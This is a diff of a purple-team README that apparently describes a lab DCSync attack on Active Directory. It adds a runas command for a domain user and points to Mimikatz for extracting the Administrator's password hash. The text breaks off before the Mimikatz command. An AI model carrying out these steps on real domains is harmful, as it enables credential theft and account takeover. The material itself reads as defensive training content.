garciaizcoa/Cybersecurity-Purple/README.md

 Replicating Directory Changes All

 Steps:
-1. Run a Command Shell or Powershell as Admin:
+1. Run a Command Shell or Powershell as Admin (To be able to run DCSync, a user needs the "Replicating Directory Changes" and "Replicating Directory Changes All" permissions in Active Directory.):

+`runas /user:eagle.local\rocky powershell.exe`

 2. Use [Mimikatz](https://github.com/gentilkiwi/mimikatz) for performing DCSync.
 We can run it by specifying the username whose password hash we want to obtain if the attack is successful, in this case, the user 'Administrator':

 `